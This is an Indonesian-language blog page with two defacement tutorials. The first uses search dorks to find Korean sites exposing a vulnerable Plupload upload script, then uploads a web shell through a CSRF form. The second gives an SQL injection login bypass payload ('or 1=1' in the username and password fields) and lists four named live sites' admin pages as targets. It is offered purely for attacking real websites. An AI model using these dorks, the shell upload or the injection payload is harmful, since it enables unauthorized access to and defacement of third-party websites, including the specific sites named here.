Deface metode Plupload Vulnerability File Upload situs Korea (upload shell)

Gambar
Hey gan kali gw akan share deface metode Plupload terbaru, ok langsung simak aja

Bahan2 yg dibutuhin

- Hp / Pc
- Internet (ya iya lah)
- Csrf click me
Oh iya filetype di csrf bisa diganti misal : shell.php
simpan csrf ext:html/htm
- Exploit
plupload/examples/upload.php
- Dork
inul:/plupload site:kr
inurl:/plupload/examples/upload.php site:kr

Kembangin lagi biar dapet web yang vuln

Ok langsung aja (perhatikan baik2)

Cari di gambar ya


Misal seperti ini


Masuk ke web nya


Klik gambar tadi yang sebelum masuk web
Lihat gambar / open new tab
bila sudah, lanjut



Hapus tambahkan Exploit nya
/plupload/examples/upload.php

Misal
http://target.kr/data/plupload/p1bhh6i89s1lehk1i1k1jbd1ptd1.jpg hapus masuk kan Exploit jadi
http://target.kr/plupload/examples/upload.php

Bila sudah akan seperti ini




Copy link pastekan / tempel ke csrf tadi



Bila sudah upload backdoor / shell kalian




Tunggu hingga loading selesai 
Bila sudah selesai maka tampilannya akan sama



Letak backdoor / shell lu?
Setiap web beda, jadi lu h…

Deface metode Bypass SQL login New Dork


Ok kali ini saya akan share Bypass SQL Login bahan" yang kita butuhkan adalah




- hp / pc
- internet (penting)
- dork
intext:"by Black Media Group"
intext:"Developed by Black Media Group"
( Kembangin biar dpt yg belum pernah ke touch )

Ok pertama dorking dulu


Bila udh dpt web nya,misal http://www.target.com/?route=client
Hapus "?route=client" tambahin /admin
Jadi http://www.target.com/admin


Jika udah tambahin user dan pass nya
user : ' or 1=1 limit 1 -- -+
pass : ' or 1=1 limit 1 -- -+


Taraaaa terserah mau lu apain deh web nya :D


Livetarget : 

http://www.pordahavas.com/admin/
http://catalo.bmgdemo.com/admin/
http://www.apexace.com/admin/
http://horizonplazahk.com/admin/

Kalau udh di pacth admin jngn sampai saya ya
 Ok sekian dulu dari saya bye bye :v

Komentar

Postingan populer dari blog ini

Deface metode Plupload Vulnerability File Upload situs Korea (upload shell)